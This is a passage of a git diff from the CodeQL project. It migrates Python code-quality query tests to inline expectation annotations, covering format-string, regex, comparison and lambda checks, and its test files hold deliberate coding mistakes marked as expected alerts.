Expressions/Formatting/UnusedArgumentIn3101Format.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref index 6a77d8910797..a1e71b6cd8b9 100644 --- a/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref +++ b/python/ql/test/query-tests/Expressions/Formatting/UnusedNamedArgumentIn3101Format.qlref @@ -1 +1,2 @@ -Expressions/Formatting/UnusedNamedArgumentIn3101Format.ql \ No newline at end of file +query: Expressions/Formatting/UnusedNamedArgumentIn3101Format.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref index e0b308870342..6bd5b9c75dad 100644 --- a/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref +++ b/python/ql/test/query-tests/Expressions/Formatting/WrongNameInArgumentsFor3101Format.qlref @@ -1 +1,2 @@ -Expressions/Formatting/WrongNameInArgumentsFor3101Format.ql \ No newline at end of file +query: Expressions/Formatting/WrongNameInArgumentsFor3101Format.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref index 130a6525a901..02168e01c644 100644 --- a/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref +++ b/python/ql/test/query-tests/Expressions/Formatting/WrongNumberArgumentsFor3101Format.qlref @@ -1 +1,2 @@ -Expressions/Formatting/WrongNumberArgumentsFor3101Format.ql \ No newline at end of file +query: Expressions/Formatting/WrongNumberArgumentsFor3101Format.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Formatting/test.py b/python/ql/test/query-tests/Expressions/Formatting/test.py index e9fd23c8aad6..3117a9de2a48 100755 --- a/python/ql/test/query-tests/Expressions/Formatting/test.py +++ b/python/ql/test/query-tests/Expressions/Formatting/test.py @@ -1,11 +1,11 @@ from __future__ import unicode_literals -mixed_format1 = "{}{1}" +mixed_format1 = "{}{1}" # $ Alert[py/str-format/mixed-fields] named_format1 = "{name!r}, {0}" explicit_format1 = "{0}, {1}" implicit_format1 = "{}, {}" -mixed_format2 = "{}{1}" +mixed_format2 = "{}{1}" # $ Alert[py/str-format/mixed-fields] named_format2 = "{name!r}, {0}" explicit_format2 = "{0}, {1}" implicit_format2 = "{}, {}" @@ -14,23 +14,23 @@ mixed_format1.format("Hello", "World") format(mixed_format2, "Hello", "World") -named_format1.format("Hello", world="World") -format(named_format2, "Hello", world="World") +named_format1.format("Hello", world="World") # $ Alert[py/str-format/missing-named-argument] Alert[py/str-format/surplus-named-argument] +format(named_format2, "Hello", world="World") # $ Alert[py/str-format/missing-named-argument] Alert[py/str-format/surplus-named-argument] -named_format1.format(name="Hello", world="World") -format(named_format2, name="Hello", world="World") +named_format1.format(name="Hello", world="World") # $ Alert[py/str-format/missing-argument] Alert[py/str-format/surplus-named-argument] +format(named_format2, name="Hello", world="World") # $ Alert[py/str-format/missing-argument] Alert[py/str-format/surplus-named-argument] -explicit_format1.format("Hello") -format(explicit_format2, "Hello") +explicit_format1.format("Hello") # $ Alert[py/str-format/missing-argument] +format(explicit_format2, "Hello") # $ Alert[py/str-format/missing-argument] -implicit_format1.format("Hello") -format(implicit_format2, "Hello") +implicit_format1.format("Hello") # $ Alert[py/str-format/missing-argument] +format(implicit_format2, "Hello") # $ Alert[py/str-format/missing-argument] -explicit_format1.format("Hello", "World", "Extra") -format(explicit_format2, "Hello", "World", "Extra") +explicit_format1.format("Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] +format(explicit_format2, "Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] -implicit_format1.format("Hello", "World", "Extra") -format(implicit_format2, "Hello", "World", "Extra") +implicit_format1.format("Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] +format(implicit_format2, "Hello", "World", "Extra") # $ Alert[py/str-format/surplus-argument] #OK ODASA-3197 if cond: @@ -42,8 +42,8 @@ x_or_y.format(x="x", y="y") #Still fail for multiple formats -format(x_or_y, x="x", y="y", z="z") -x_or_y.format(x="x", y="y", z="z") +format(x_or_y, x="x", y="y", z="z") # $ Alert[py/str-format/surplus-named-argument] +x_or_y.format(x="x", y="y", z="z") # $ Alert[py/str-format/surplus-named-argument] #False positive reported by customer. -- Verify fix. "{{}}>".format(html_class) diff --git a/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py b/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py index a3b32a504db3..690716e20b2d 100644 --- a/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py +++ b/python/ql/test/query-tests/Expressions/Formatting/unknown_format_string.py @@ -6,7 +6,7 @@ def possibly_unknown_format_string1(x): fmt = user_specified else: fmt = "{a}" - return fmt.format(a=1,b=2) + return fmt.format(a=1,b=2) # $ Alert[py/str-format/surplus-named-argument] def possibly_unknown_format_string2(x): user_specified = input() @@ -14,7 +14,7 @@ def possibly_unknown_format_string2(x): fmt = user_specified else: fmt = "{a}" - return fmt.format(a=1,b=2) + return fmt.format(a=1,b=2) # $ Alert[py/str-format/surplus-named-argument] def possibly_unknown_format_string3(x): @@ -22,4 +22,4 @@ def possibly_unknown_format_string3(x): fmt = input() else: fmt = "{a}" - return fmt.format(a=1,b=2) + return fmt.format(a=1,b=2) # $ Alert[py/str-format/surplus-named-argument] diff --git a/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref b/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref index 2bf85f8a45aa..25a46ec7b29b 100644 --- a/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref +++ b/python/ql/test/query-tests/Expressions/Regex/BackspaceEscape.qlref @@ -1 +1,2 @@ -Expressions/Regex/BackspaceEscape.ql +query: Expressions/Regex/BackspaceEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref b/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref index f0fc83c214eb..358d546ce8ad 100644 --- a/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref +++ b/python/ql/test/query-tests/Expressions/Regex/DuplicateCharacterInSet.qlref @@ -1 +1,2 @@ -Expressions/Regex/DuplicateCharacterInSet.ql +query: Expressions/Regex/DuplicateCharacterInSet.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref b/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref index faf8f31ad4d6..215e7874972d 100644 --- a/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref +++ b/python/ql/test/query-tests/Expressions/Regex/MissingPartSpecialGroup.qlref @@ -1 +1,2 @@ -Expressions/Regex/MissingPartSpecialGroup.ql +query: Expressions/Regex/MissingPartSpecialGroup.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref b/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref index 161fd59f7f28..218dcb021982 100644 --- a/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref +++ b/python/ql/test/query-tests/Expressions/Regex/UnmatchableCaret.qlref @@ -1 +1,2 @@ -Expressions/Regex/UnmatchableCaret.ql +query: Expressions/Regex/UnmatchableCaret.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref b/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref index b162342922c5..cabb436241ce 100644 --- a/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref +++ b/python/ql/test/query-tests/Expressions/Regex/UnmatchableDollar.qlref @@ -1 +1,2 @@ -Expressions/Regex/UnmatchableDollar.ql +query: Expressions/Regex/UnmatchableDollar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Regex/test.py b/python/ql/test/query-tests/Expressions/Regex/test.py index 717663e335c5..c9aea2d9ceff 100644 --- a/python/ql/test/query-tests/Expressions/Regex/test.py +++ b/python/ql/test/query-tests/Expressions/Regex/test.py @@ -1,9 +1,9 @@ import re #Unmatchable caret -re.compile(b' ^abc') -re.compile(b"(?s) ^abc") -re.compile(b"\[^123]") +re.compile(b' ^abc') # $ Alert[py/regex/unmatchable-caret] +re.compile(b"(?s) ^abc") # $ Alert[py/regex/unmatchable-caret] +re.compile(b"\[^123]") # $ Alert[py/regex/unmatchable-caret] #Likely false positives for unmatchable caret re.compile(b"[^123]") @@ -14,21 +14,21 @@ re.compile(b"^diff (?:-r [0-9a-f]+ ){1,2}(.*)$") #Backspace escape -re.compile(br"[\b\t ]") # Should warn +re.compile(br"[\b\t ]") # Should warn # $ Alert[py/regex/backspace-escape] re.compile(br"E\d+\b.*") # Fine -re.compile(br"E\d+\b[ \b\t]") #Both +re.compile(br"E\d+\b[ \b\t]") #Both # $ Alert[py/regex/backspace-escape] #Missing part in named group -re.compile(br'(P[\w]+)') -re.compile(br'(_(P[\w]+)|)') +re.compile(br'(P[\w]+)') # $ Alert[py/regex/incomplete-special-group] +re.compile(br'(_(P[\w]+)|)') # $ Alert[py/regex/incomplete-special-group] #This is OK... re.compile(br'(?P\w+)') #Unmatchable dollar -re.compile(b"abc$ ") -re.compile(b"abc$ (?s)") -re.compile(b"\[$] ") +re.compile(b"abc$ ") # $ Alert[py/regex/unmatchable-dollar] +re.compile(b"abc$ (?s)") # $ Alert[py/regex/unmatchable-dollar] +re.compile(b"\[$] ") # $ Alert[py/regex/unmatchable-dollar] #Not unmatchable dollar re.match(b"[$] ", b"$ ") @@ -43,9 +43,9 @@ re.match(b"(a){00}b", b"b") #Duplicate character in set -re.compile(b"[AA]") -re.compile(b"[000]") -re.compile(b"[-0-9-]") +re.compile(b"[AA]") # $ Alert[py/regex/duplicate-in-character-class] +re.compile(b"[000]") # $ Alert[py/regex/duplicate-in-character-class] +re.compile(b"[-0-9-]") # $ Alert[py/regex/duplicate-in-character-class] #Possible false positives re.compile(b"[S\S]") @@ -76,8 +76,8 @@ #Not OK -re.compile(br'(?<=foo)^\w+') -re.compile(br'\w+$(?=foo)') +re.compile(br'(?<=foo)^\w+') # $ Alert[py/regex/unmatchable-caret] +re.compile(br'\w+$(?=foo)') # $ Alert[py/regex/unmatchable-dollar] #OK -- ODASA-ODASA-3968 @@ -134,7 +134,7 @@ \[ # [ (?P
[^]]+) # very permissive! \] # ] - """ + """ # $ Alert[py/regex/duplicate-in-character-class] # Compiled regular expression marking it as verbose ODASA_6786 = re.compile(VERBOSE_REGEX, re.VERBOSE) diff --git a/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref b/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref index ea8577e6f9fb..e26b890fde89 100644 --- a/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref +++ b/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref @@ -1 +1,2 @@ -Expressions/NonCallableCalled.ql \ No newline at end of file +query: Expressions/NonCallableCalled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/callable/test.py b/python/ql/test/query-tests/Expressions/callable/test.py index 5498fba72926..e37daba131fb 100644 --- a/python/ql/test/query-tests/Expressions/callable/test.py +++ b/python/ql/test/query-tests/Expressions/callable/test.py @@ -13,9 +13,9 @@ def __call__(self): def call_non_callable(arg): non = NonCallable() - non(arg) - ()() - []() + non(arg) # $ Alert + ()() # $ Alert + []() # $ Alert dont_know = MaybeCallable() dont_know() # Not a violation ok = IsCallable() @@ -23,7 +23,7 @@ def call_non_callable(arg): if hasattr(non, "__call__"): non(arg) # OK due to guard if hasattr(non, "__init__"): - non(arg) # Not OK due to wrong guard + non(arg) # Not OK due to wrong guard # $ Alert import six @@ -44,7 +44,7 @@ def foo(): raise NotImplemented() def bar(): - return NotImplemented() + return NotImplemented() # $ Alert # FP due to decorator @@ -60,7 +60,7 @@ def __init__(self, arg): @some_decorator @classmethod def new_instance(cls, new_arg): - return cls(new_arg) # TODO: FP + return cls(new_arg) # TODO: FP # $ Alert f1 = Foo(1) f2 = f1.new_instance(2) diff --git a/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref b/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref index fb7f75f9f615..e022932acda4 100644 --- a/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref +++ b/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref @@ -1 +1,2 @@ -Expressions/Comparisons/UselessComparisonTest.ql \ No newline at end of file +query: Expressions/Comparisons/UselessComparisonTest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/comparisons/test.py b/python/ql/test/query-tests/Expressions/comparisons/test.py index aac73f4932eb..db0db60e2edf 100644 --- a/python/ql/test/query-tests/Expressions/comparisons/test.py +++ b/python/ql/test/query-tests/Expressions/comparisons/test.py @@ -3,16 +3,16 @@ def f(w, x, y, z): if x < 0 or z < 0: raise Exception() - if x >= 0: # Useless test due to x < 0 being false + if x >= 0: # Useless test due to x < 0 being false # $ Alert y += 1 - if z >= 0: # Useless test due to z < 0 being false + if z >= 0: # Useless test due to z < 0 being false # $ Alert y += 1 while w >= 0: if y < 10: z += 1 - if y == 15: # Useless test due to y < 10 being true + if y == 15: # Useless test due to y < 10 being true # $ Alert z += 1 - elif y > 7: # Useless test + elif y > 7: # Useless test # $ Alert y -= 1 if y < 10: y += 1 @@ -24,10 +24,10 @@ def f(w, x, y, z): def g(w, x, y, z): if w < x or y < z+2: raise Exception() - if w >= x: # Useless test due to w < x being false + if w >= x: # Useless test due to w < x being false # $ Alert pass if cond: - if z > y-2: # Useless test due to y < z+2 being false + if z > y-2: # Useless test due to y < z+2 being false # $ Alert y += 1 else: if z >= y-2: # Not a useless test. @@ -46,7 +46,7 @@ def validate_series(start, end): def medium1(x, y): if x + 1000000000000000 > y + 1000000000000000: return - if x > y: # Redundant + if x > y: # Redundant # $ Alert pass def medium2(x, y): @@ -70,19 +70,19 @@ def big2(x, y): def odasa6782_v1(protocol): if protocol < 0: protocol = HIGHEST_PROTOCOL - elif not 0 <= protocol: + elif not 0 <= protocol: # $ Alert raise ValueError() def odasa6782_v2(protocol): if protocol < 0: protocol = HIGHEST_PROTOCOL - elif not 0 <= protocol <= HIGHEST_PROTOCOL: + elif not 0 <= protocol <= HIGHEST_PROTOCOL: # $ Alert raise ValueError() def odasa6782_v3(protocol): if protocol < 0: protocol = HIGHEST_PROTOCOL - elif 0 <= protocol <= HIGHEST_PROTOCOL: + elif 0 <= protocol <= HIGHEST_PROTOCOL: # $ Alert pass else: raise ValueError() diff --git a/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref b/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref index 73123cf76281..df847ee2b1bb 100644 --- a/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref +++ b/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref @@ -1 +1,2 @@ -Expressions/IncorrectComparisonUsingIs.ql +query: Expressions/IncorrectComparisonUsingIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref b/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref index 13c08534293c..a62a6a40f60d 100644 --- a/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref +++ b/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref @@ -1 +1,2 @@ -Expressions/NonPortableComparisonUsingIs.ql +query: Expressions/NonPortableComparisonUsingIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/eq/expressions_test.py b/python/ql/test/query-tests/Expressions/eq/expressions_test.py index 3489bf3a1a94..632616583c39 100644 --- a/python/ql/test/query-tests/Expressions/eq/expressions_test.py +++ b/python/ql/test/query-tests/Expressions/eq/expressions_test.py @@ -43,12 +43,12 @@ def meth(self): #Using 'is' when should be using '==' s = "Hello " + "World" -if "Hello World" is s: +if "Hello World" is s: # $ Alert[py/comparison-using-is] print ("OK") #This is OK in CPython, but may not be portable s = str(7) -if "7" is s: +if "7" is s: # $ Alert[py/comparison-using-is-non-portable] print ("OK") #And some data flow diff --git a/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref b/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref index 0e2ab115eeec..5b5160d860d5 100644 --- a/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref +++ b/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref @@ -1 +1,2 @@ -Expressions/CompareConstants.ql +query: Expressions/CompareConstants.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref index 4bc0ec69fc04..ad4cbb7600e8 100644 --- a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref +++ b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref @@ -1 +1,2 @@ -Expressions/CompareIdenticalValues.ql +query: Expressions/CompareIdenticalValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref index f19a0dee4364..48f4d302afba 100644 --- a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref +++ b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref @@ -1 +1,2 @@ -Expressions/CompareIdenticalValuesMissingSelf.ql \ No newline at end of file +query: Expressions/CompareIdenticalValuesMissingSelf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref b/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref index 71df405e72c1..b52c39ed26d2 100644 --- a/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref +++ b/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref @@ -1 +1,2 @@ -Expressions/ContainsNonContainer.ql +query: Expressions/ContainsNonContainer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref b/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref index a1bb71098829..23123f187490 100644 --- a/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref +++ b/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref @@ -1 +1,2 @@ -Expressions/DuplicateKeyInDictionaryLiteral.ql \ No newline at end of file +query: Expressions/DuplicateKeyInDictionaryLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref b/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref index 8d9699258e25..026a3f5bbc2f 100644 --- a/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref +++ b/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref @@ -1 +1,2 @@ -Expressions/EqualsNone.ql \ No newline at end of file +query: Expressions/EqualsNone.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref b/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref index 83e92584ef27..fd322b848dca 100644 --- a/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref +++ b/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref @@ -1 +1,2 @@ -Expressions/ExpectedMappingForFormatString.ql \ No newline at end of file +query: Expressions/ExpectedMappingForFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref b/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref index 932f1a3d366d..451bd74eee0e 100644 --- a/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref +++ b/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref @@ -1 +1,2 @@ -Expressions/ExplicitCallToDel.ql \ No newline at end of file +query: Expressions/ExplicitCallToDel.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref b/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref index ee53e3674999..f30fd92870f0 100644 --- a/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref +++ b/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref @@ -1 +1,2 @@ -Expressions/HashedButNoHash.ql \ No newline at end of file +query: Expressions/HashedButNoHash.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref b/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref index 49b3873f83ce..9141c5e49a65 100644 --- a/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref +++ b/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref @@ -1 +1,2 @@ -Expressions/UnnecessaryLambda.ql \ No newline at end of file +query: Expressions/UnnecessaryLambda.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref b/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref index 3cb459229e4a..8e50b947401e 100644 --- a/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref +++ b/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref @@ -1 +1,2 @@ -Expressions/UnsupportedFormatCharacter.ql \ No newline at end of file +query: Expressions/UnsupportedFormatCharacter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref b/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref index 0d127e1b618b..744334a6aeb1 100644 --- a/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref +++ b/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref @@ -1 +1,2 @@ -Expressions/WrongNumberArgumentsForFormat.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsForFormat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/compare.py b/python/ql/test/query-tests/Expressions/general/compare.py index 141b5e6a0286..c48e06f4b1ca 100644 --- a/python/ql/test/query-tests/Expressions/general/compare.py +++ b/python/ql/test/query-tests/Expressions/general/compare.py @@ -5,12 +5,12 @@ a.x == b.x #Same variables -a == a -a.x == a.x +a == a # $ Alert[py/comparison-of-identical-expressions] +a.x == a.x # $ Alert[py/comparison-of-identical-expressions] #Compare constants -1 == 1 -1 == 2 +1 == 1 # $ Alert[py/comparison-of-constants] +1 == 2 # $ Alert[py/comparison-of-constants] #Maybe missing self class X(object): @@ -19,7 +19,7 @@ def __init__(self, x): self.x = x def missing_self(self, x): - if x == x: + if x == x: # $ Alert[py/comparison-missing-self] print ("Yes") #Compare constants in assert -- ok diff --git a/python/ql/test/query-tests/Expressions/general/expressions_test.py b/python/ql/test/query-tests/Expressions/general/expressions_test.py index 5e07b58e2041..71e0d1ba7cf0 100644 --- a/python/ql/test/query-tests/Expressions/general/expressions_test.py +++ b/python/ql/test/query-tests/Expressions/general/expressions_test.py @@ -1,16 +1,16 @@ #encoding: utf-8 def dup_key(): - return { 1: -1, + return { 1: -1, # $ Alert[py/duplicate-key-dict-literal] 1: -2, - u'a' : u'A', + u'a' : u'A', # $ Alert[py/duplicate-key-dict-literal] u'a' : u'B' } def simple_func(*args, **kwrgs): pass #Unnecessary lambdas -lambda arg0, arg1: simple_func(arg0, arg1) -lambda arg0, *arg1: simple_func(arg0, *arg1) -lambda arg0, **arg1: simple_func(arg0, **arg1) +lambda arg0, arg1: simple_func(arg0, arg1) # $ Alert[py/unnecessary-lambda] +lambda arg0, *arg1: simple_func(arg0, *arg1) # $ Alert[py/unnecessary-lambda] +lambda arg0, **arg1: simple_func(arg0, **arg1) # $ Alert[py/unnecessary-lambda] # these lambdas are_ necessary lambda arg0, arg1=1: simple_func(arg0, arg1) lambda arg0, arg1: simple_func(arg0, *arg1) @@ -34,12 +34,12 @@ def call_non_callable(arg): dont_know() # Not a violation #Explicit call to __del__ -x.__del__() +x.__del__() # $ Alert[py/explicit-call-to-delete] #Unhashable object def func(): mapping = dict(); unhash = list() - return mapping[unhash] + return mapping[unhash] # $ Alert[py/hash-unhashable-value] #Using 'is' when should be using '==' s = "Hello " + "World" @@ -86,9 +86,9 @@ def next(self): def non_container(): seq = XIter() - if 1 in seq: + if 1 in seq: # $ Alert[py/member-test-non-container] pass - if 1 not in seq: + if 1 not in seq: # $ Alert[py/member-test-non-container] pass #Container inheriting from builtin @@ -112,7 +112,7 @@ def is_container(): #Equals none def x(arg): - return arg == None + return arg == None # $ Alert[py/test-equals-none] class NotMyDict(object): @@ -130,7 +130,7 @@ def __del__(self): # This is permitted and required. Test.__del__(self) # This is a violation. - self.__del__() + self.__del__() # $ Alert[py/explicit-call-to-delete] # This is an alternate syntax for the super() call, and hence OK. super(SubTest, self).__del__() # This is the Python 3 spelling of the same. @@ -138,15 +138,15 @@ def __del__(self): #Some more lambdas #Unnecessary lambdas -lambda arg0: len(arg0) -lambda arg0: XIter.next(arg0) +lambda arg0: len(arg0) # $ Alert[py/unnecessary-lambda] +lambda arg0: XIter.next(arg0) # $ Alert[py/unnecessary-lambda] class UL(object): def f(self, x): pass def g(self): - return lambda x: self.f(x) + return lambda x: self.f(x) # $ Alert[py/unnecessary-lambda] # these lambdas are necessary lambda arg0: XIter.next(arg0, arg1) diff --git a/python/ql/test/query-tests/Expressions/general/str_fmt_test.py b/python/ql/test/query-tests/Expressions/general/str_fmt_test.py index e941b842c319..f7441ef9a8ad 100644 --- a/python/ql/test/query-tests/Expressions/general/str_fmt_test.py +++ b/python/ql/test/query-tests/Expressions/general/str_fmt_test.py @@ -2,16 +2,16 @@ def expected_mapping_for_fmt_string(): x = [ u'list', u'not', u'mapping' ] - print (u"%(name)s" % x) + print (u"%(name)s" % x) # $ Alert[py/percent-format/not-mapping] def unsupported_format_char(arg): - print (u"%Z" % arg) + print (u"%Z" % arg) # $ Alert[py/percent-format/unsupported-character] def wrong_arg_count_format(arg): - print(u"%s %s" % (arg, arg, 0)) + print(u"%s %s" % (arg, arg, 0)) # $ Alert[py/percent-format/wrong-arguments] format = u"%hd" args = (1, u'foo') - print(format % args) + print(format % args) # $ Alert[py/percent-format/wrong-arguments] def ok(): diff --git a/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref b/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref index c305fd129f8b..7159e5c79721 100644 --- a/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref +++ b/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref @@ -1 +1,2 @@ -Expressions/UnintentionalImplicitStringConcatenation.ql \ No newline at end of file +query: Expressions/UnintentionalImplicitStringConcatenation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/strings/test.py b/python/ql/test/query-tests/Expressions/strings/test.py index 15b3c9216e33..1767a2d109be 100644 --- a/python/ql/test/query-tests/Expressions/strings/test.py +++ b/python/ql/test/query-tests/Expressions/strings/test.py @@ -15,13 +15,13 @@ def test(): error1 = [ "foo", "/usr/local" - "/usr/bin" + "/usr/bin" # $ Alert ] error2 = [ "foo" + "bar", "/usr/local" - "/usr/bin" + "/usr/bin" # $ Alert ] #Examples from documentation @@ -31,9 +31,9 @@ def unclear(): return [ "first part of long string" - " and the second part", + " and the second part", # $ Alert "/usr/local" - "/usr/bin" + "/usr/bin" # $ Alert ] def clarified(): diff --git a/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref b/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref index c3beeaede04b..e1ed0c122bea 100644 --- a/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref +++ b/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref @@ -1 +1,2 @@ -Expressions/CallToSuperWrongClass.ql \ No newline at end of file +query: Expressions/CallToSuperWrongClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/super/test.py b/python/ql/test/query-tests/Expressions/super/test.py index e2e667cd25d7..947bc3814b2a 100644 --- 